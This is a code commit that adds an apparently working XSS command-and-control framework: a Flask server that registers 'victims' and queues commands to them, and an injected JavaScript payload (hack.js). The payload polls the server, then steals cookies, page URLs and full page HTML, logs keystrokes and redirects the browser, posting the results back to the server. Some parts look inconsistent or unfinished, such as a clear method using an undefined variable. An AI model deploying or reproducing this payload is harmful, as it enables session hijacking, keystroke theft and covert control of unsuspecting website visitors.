Python version of the server

python/server.py

@@ -0,0 +1,7 @@
+__author__ = 'jason'
+
+from xss_tunnel_server import app
+
+if __name__ == '__main__':
+    app.run()
+

python/xss_tunnel_server/__init__.py

@@ -0,0 +1,14 @@
+from flask import Flask
+
+app = Flask(__name__)
+app.debug = True
+
+from xss_tunnel_server.victims_store import VictimStore
+victimStore = VictimStore()
+
+from xss_tunnel_server.commands_store import CommandStore
+commandStore = CommandStore()
+
+import xss_tunnel_server.home
+import xss_tunnel_server.shell
+import xss_tunnel_server.tunnel

python/xss_tunnel_server/commands_store.py

@@ -0,0 +1,20 @@
+class CommandStore():
+
+    def __init__(self):
+        self.victimCommands = {}
+
+    def addCommand(self, id, command):
+        if not self.victimCommands.has_key(id):
+            self.victimCommands[id] = []
+
+        self.victimCommands[id].append(command)
+
+    def getCommands(self, id):
+        if self.victimCommands.has_key(id):
+            return self.victimCommands[id]
+
+        return []
+
+    def clear(self):
+        if self.victimCommands.has_key(id):
+            self.victimCommands.clear()

python/xss_tunnel_server/hack.py

@@ -0,0 +1,15 @@
+from flask import make_response
+from functools import update_wrapper
+
+def hack(f):
+    def new_func(*args, **kwargs):
+        resp = make_response(f(*args, **kwargs))
+
+        resp.headers['Access-Control-Allow-Origin'] = '*'
+        resp.headers['Access-Control-Allow-Methods'] = 'GET, POST, PUT, DELETE, OPTIONS'
+        resp.headers['Access-Control-Allow-Headers'] = 'origin, content-type, accept, x-requested-with'
+        resp.headers['Access-Control-Max-Age'] = '1800'
+
+        return resp
+
+    return update_wrapper(new_func, f)

python/xss_tunnel_server/home.py

@@ -0,0 +1,17 @@
+from flask import render_template
+from xss_tunnel_server import app, victimStore
+
+from xss_tunnel_server.nocache import nocache
+from xss_tunnel_server.hack import hack
+
+@app.route('/')
+@nocache
+def index():
+    return render_template('index.html', title = 'Home',
+                           victims = victimStore.getVictims())
+
+@app.route('/victim')
+@nocache
+@hack
+def victim():
+    return render_template('victim.html')

python/xss_tunnel_server/model/shell_command.py

@@ -0,0 +1,10 @@
+import time
+
+class ShellCommand():
+
+    def __init__(self, id, type, metaData):
+        self.id = id
+        self.date = time.strftime("%H:%M:%S")
+        self.type = type
+        self.metaData = metaData
+

python/xss_tunnel_server/model/victim.py

@@ -0,0 +1,26 @@
+import time
+
+class Victim():
+
+    def __init__(self, id, request):
+        firstSeen = time.strftime("%H:%M:%S")
+        self.id = id
+        self.ip = request.remote_addr
+        self.userAgent = request.user_agent
+        self.referrer = request.referrer
+        self.firstSeen = firstSeen
+        self.lastSeen = firstSeen
+        self.commandQueue = []
+        self.currentPage = ''
+
+    def updateLastSeen(self):
+        self.lastSeen = time.strftime("%H:%M:%S")
+
+    def queueCommand(self, command):
+        self.commandQueue.append(command)
+
+    def hasCommands(self):
+        return len(self.commandQueue) > 0
+
+    def pollCommands(self):
+        return self.commandQueue.pop()

python/xss_tunnel_server/nocache.py

@@ -0,0 +1,11 @@
+from flask import make_response
+from functools import update_wrapper
+
+def nocache(f):
+    def new_func(*args, **kwargs):
+        resp = make_response(f(*args, **kwargs))
+        resp.cache_control.no_cache = True
+
+        return resp
+
+    return update_wrapper(new_func, f)

python/xss_tunnel_server/shell.py

@@ -0,0 +1,34 @@
+from xss_tunnel_server import app, commandStore, victimStore
+from flask import json, request, render_template
+
+@app.route('/shell/<id>',  methods=['GET'])
+def shell(id):
+    commands = commandStore.getCommands(id)
+
+    return render_template('shell.html', title = 'Shell', id = id, commands = commands)
+
+@app.route('/shellCommands/<id>',  methods=['GET'])
+def command(id):
+    commands = commandStore.getCommands(id)
+
+    return render_template('commands.html', title = 'Shell Commands', commands = commands)
+
+@app.route('/currentPage/<id>',  methods=['GET'])
+def current_page(id):
+    return victimStore.getVictim(id).currentPage
+
+@app.route('/receiveShellCommand/<id>', methods=['POST'])
+def receive_command(id):
+    print request.data
+    command = json.loads(request.data)
+
+    if command.has_key('id'):
+        commandStore.addCommand(id, command)
+        victimStore.getVictim(id).queueCommand(command)
+
+    return 'ok'
+
+@app.route('/clear/<id>', methods=['GET'])
+def clear_command(id):
+    commandStore.clear(id)
+    return 'ok'

python/xss_tunnel_server/static/css/main.css

@@ -0,0 +1,84 @@
+* {
+    margin:0;
+    padding:0;
+}
+
+body, html {
+    height:100%;
+    width: 100%;
+}
+
+.wrapper {
+    position:absolute;
+    left:50%;
+    top:50%;
+    width:800px;
+
+    -webkit-transform: translate(-50%, -50%);
+    -moz-transform: translate(-50%, -50%);
+    -ms-transform: translate(-50%, -50%);
+    -o-transform: translate(-50%, -50%);
+    transform: translate(-50%, -50%);
+}
+
+.wrapper h1 {
+    float:left;
+    width: 100%;
+    height:40px;
+    line-height:40px;
+    text-align:center;
+}
+
+.wrapper .left {
+    width: 600px;
+    float:left;
+}
+
+.wrapper .right {
+    float:left;
+    width:198px;
+    height:398px;
+    background:lightgrey;
+    border: 1px solid;
+    overflow-y: auto;
+    overflow-x: hidden;
+}
+
+.wrapper .bottom {
+    width: 798px;
+    height: 400px;
+    margin-top: 50px;
+    float:left;
+}
+
+#userPage {
+    border: 1px solid black;
+}
+
+.wrapper .right .function {
+    margin-left: 10px;
+    margin-top: 5px;
+    width: 175px;
+    height: 20px;
+}
+
+#input {
+    width: 500px;
+    height: 20px;
+}
+#output {
+    width: 600px;
+    height: 400px;
+    resize: none;
+    color: #00ee26;
+    background-color: black
+}
+#submitButton {
+    width: 45px;
+    height: 20px;
+}
+
+#clearButton {
+    width: 45px;
+    height: 20px;
+}

python/xss_tunnel_server/static/js/hack.js

@@ -0,0 +1,91 @@
+(function () {
+    var currentId = createUUID();
+    var keys;
+
+    var devUrl = "http://localhost:5000/";
+
+    var script = document.createElement("SCRIPT");
+    script.src = 'https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';
+    script.type = 'text/javascript';
+    document.getElementsByTagName("head")[0].appendChild(script);
+
+    var checkReady = function (callback) {
+        if (window.jQuery) {
+            callback(jQuery);
+        }
+        else {
+            window.setTimeout(function () {
+                checkReady(callback);
+            }, 100);
+        }
+    };
+
+    checkReady(function ($) {
+        setInterval(
+                function () {
+                    $.ajax({
+                               type: 'GET',
+                               url: devUrl + 'ping/' + currentId,
+                               contentType: 'text/plain',
+                               xhrFields: {
+                                   withCredentials: false
+                               },
+                               success: function (data) {
+                                   if (data != 'ntp') {
+                                       handleData(data);
+                                   }
+                               }
+                           });
+                }, 1000);
+    });
+
+
+    function startKeylogger() {
+        $("body").on("keypress", function (e) {
+            keys = keys + String.fromCharCode(e.which);
+        });
+    }
+
+    function stopKeyLogger() {
+        $("body").off("keypress");
+        sendCommandToServer('receiveKeys', keys);
+        keys = '';
+    }
+
+    var handleData = function (data) {
+        console.dir(data);
+        if (data.type == 'msg') {
+            alert(data.metaData);
+        } else if (data.type == 'getCookies') {
+            sendCommandToServer("receiveCookies", document.cookie);
+        } else if (data.type == 'getUrl') {
+            sendCommandToServer("receiveUrl", window.location.href);
+        } else if (data.type == 'getSite') {
+            sendCommandToServer("receiveSite", document.documentElement.outerHTML);
+        } else if (data.type == 'startLogger') {
+            startKeylogger();
+        } else if (data.type == 'stopLogger') {
+            stopKeyLogger();
+        } else if (data.type == 'goToUrl') {
+            window.location.href = data.metadata;
+        }
+
+    };
+
+    function sendCommandToServer(type, data) {
+        $.ajax({
+                   type: "POST",
+                   url: devUrl + type + '/' + currentId,
+                   data: data,
+                   contentType: "application/json; charset=utf-8"
+               });
+    }
+
+    function createUUID() {
+        return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function (c) {
+            var r = Math.random() * 16 | 0, v = c === 'x' ? r : (r & 0x3 | 0x8);
+            return v.toString(16);
+        });
+    }
+
+})();